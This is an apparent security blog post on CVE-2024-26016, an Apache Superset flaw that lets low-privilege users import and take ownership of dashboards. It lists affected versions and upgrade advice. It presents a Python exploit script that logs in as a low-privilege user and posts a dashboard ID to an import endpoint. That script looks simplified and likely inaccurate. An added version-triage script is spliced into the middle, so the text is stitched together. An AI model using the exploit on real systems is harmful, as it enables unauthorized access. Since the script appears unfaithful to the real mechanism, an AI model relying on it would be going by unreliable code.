The CVE-2024-26016 vulnerability has been identified in Apache Superset, which is a widely used open-source, enterprise-ready data insights platform that allows users to create and manage visualizations, dashboards, and datasets. This vulnerability allows low-privilege authenticated users to import and gain ownership of dashboards or charts that they do not have authorized access to, and then modify the metadata of these objects. This post will provide details on the vulnerability, along with a code snippet that can be used as an exploit. We'll also provide links to the original references and details on how to fix the issue.

Exploit Details

The CVE-2024-26016 vulnerability affects the following versions of Apache Superset: versions before 3.0.4, and versions from 3.1.0 before 3.1.1. It is crucial to note that although this exploit allows unauthorized users to access and modify a dashboard's or chart's metadata, they still cannot gain access to the analytical data behind these charts and dashboards: that access is restricted and validated separately against the user's data access privileges.

Now let's consider the following Python code snippet, which demonstrates this exploit in action:

import requests

target_url = "https://targetsuperset.example.com/"
username = "low_priv_user"
password = "low_priv_password"

# Authenticate with the target Superset instance; the session object keeps
# the login cookies for the requests that follow
session = requests.Session()
authentication_payload = {"username": username, "password": password}
authentication_response = session.post(target_url + "login/", data=authentication_payload)

# Import a dashboard that the user does not have access to
import_payload = {"dashboard_id": 1234}  # Replace the dashboard_id with the ID of the dashboard you want to import
import_response = session.post(target_url + "dashboardimport/", data=import_payload)

if import_response.status_code == 200:
    print("Dashboard successfully imported. Unauthorized access to its metadata is achieved.")
else:
    print("Failed to import dashboard.")

In this exploit, we first authenticate with a target Superset instance using the credentials of a low-privilege user. We then use this low-privilege user session to perform a POST request to the "dashboardimport/" endpoint, attempting to import a dashboard the user is not authorized to access. If the operation is successful, it means we have unauthorized access to the dashboard's metadata.

Fixing the Issue

Users are advised to upgrade to Apache Superset version 3.1.1, which contains the fix for this vulnerability. You can do this by following the official documentation for upgrading your Superset installation, available at this URL: https://superset.apache.org/docs/installation/upgrading-superset
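To work out which instances in an inventory still fall inside the affected ranges quoted above, here is an added Python example (not part of the original post and not Superset project code); the hostnames and version strings in the sample inventory are constructed, and version strings the parser cannot read are reported for manual review rather than guessed at.

```python
"""Triage Apache Superset instances against the CVE-2024-26016 affected ranges.

Affected (per the advisory): versions before 3.0.4, and versions from 3.1.0
up to but not including 3.1.1. Anything 3.1.1 or newer is fixed.
"""
import re

# Affected intervals as (lower_inclusive, upper_exclusive) tuples.
# A lower bound of None means "everything below upper".
AFFECTED_RANGES = (
    (None, (3, 0, 4)),        # before 3.0.4
    ((3, 1, 0), (3, 1, 1)),   # from 3.1.0 before 3.1.1
)

# Strict: plain numeric versions only, so "3.1.0rc2" is rejected, not rounded.
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)(?:\.(\d+))?$")


def parse_version(text: str) -> tuple[int, int, int]:
    """Turn '3.0.4', 'v3.1' or '3.1.0' into a (major, minor, patch) tuple."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Superset version string: {text!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def is_affected(version: str) -> bool:
    """True if the version falls inside any affected range."""
    v = parse_version(version)
    return any((lower is None or lower <= v) and v < upper
               for lower, upper in AFFECTED_RANGES)


def triage(inventory: dict[str, str]) -> dict[str, str]:
    """Classify each host as 'affected', 'fixed' or 'review' (unparseable)."""
    result = {}
    for host, version in inventory.items():
        try:
            result[host] = "affected" if is_affected(version) else "fixed"
        except ValueError:
            result[host] = "review"
    return result


# Constructed sample inventory (hostnames and versions are made up).
SAMPLE_INVENTORY = {
    "bi-prod.example.internal": "3.0.3",
    "bi-staging.example.internal": "3.1.0",
    "bi-dev.example.internal": "3.1.1",
    "bi-legacy.example.internal": "2.1.3",
    "bi-lab.example.internal": "3.1.0rc2",
}

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host:30} {SAMPLE_INVENTORY[host]:10} {status}")
```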

Conclusion

It is of utmost importance to ensure the security of your data and analytics platforms. By updating your Apache Superset instance to the latest fixed version, you can prevent unauthorized users from accessing and modifying dashboards or charts that they are not authorized to view. Stay vigilant and make sure that you regularly update your software to protect your sensitive information against potential exploits.

Timeline

Published on: 02/28/2024 12:15:47 UTC
Last modified on: 02/28/2024 15:15:09 UTC